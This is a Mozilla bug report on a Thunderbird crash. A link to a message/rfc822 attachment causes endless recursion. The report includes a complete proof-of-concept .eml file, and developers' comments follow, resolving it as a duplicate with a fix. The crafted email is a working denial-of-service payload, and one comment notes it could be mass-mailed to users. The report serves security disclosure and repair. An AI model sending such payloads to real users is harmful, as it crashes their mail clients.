1411735 - TBE-01-006: Crash triggered by clicking link to .eml Attachment

Status: RESOLVED DUPLICATE of bug 1343536

(MailNews Core :: Attachments, defect)

Description

[Ben Bucksch (:BenB)]

Thunderbird allows email bodies to load or link to attachments defined as other part of the email. It was discovered that a link to a message/rfc822 attachment crashes Thunderbird as soon as a user clicks on it. After analyzing the crash, it transpired that Thunderbird was stuck in a loop which triggered a stack exhaustion exception.

File:
Crash.eml

Content:
Content-Type: multipart/alternative; boundary="------------
2DEE3F98D70BD2C65FBA7373"
MIME-Version: 1.0
Subject: Link
From: payload.payload@gmx.de
To: payload.payload@gmx.de
Date: Tue, 20 Sep 2017 14:54:55 +0200

--------------2DEE3F98D70BD2C65FBA7373
Content-Type: multipart/related; boundary="------------A320A96F6639F3C578F35383"

--------------A320A96F6639F3C578F35383
Content-Type: text/html
Content-Transfer-Encoding: 7Bit

<a href="cid:test">click to crash thunderbrid</a>
--------------A320A96F6639F3C578F35383
Content-ID: test
Content-Type: message/rfc822;
name="attach.eml"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="attach.eml"
aaaaaaaaa
--------------A320A96F6639F3C578F35383--

--------------2DEE3F98D70BD2C65FBA7373--

It is recommended to evaluate the responsible code path and determine where the
recursion takes place.


For the original report as PDF; see bug 1411701.

Comment 1

[Jorg K (CEST = GMT+2)]

Looks like we already have this on file: Bug 1343536.

Comment 2

[Daniel Veditz [:dveditz]]

We might want to just dupe it, but "depends on" is fine for now if we don't want to publicize an easier way to mass-mail a DOS attack to all users.

Comment 3

[Ben Bucksch (:BenB)]

On the dup bug, Jörg says that's an endless loop. So, a DoS.

Comment 4

[Jorg K (CEST = GMT+2)]

We have a fix in bug 1343536 now.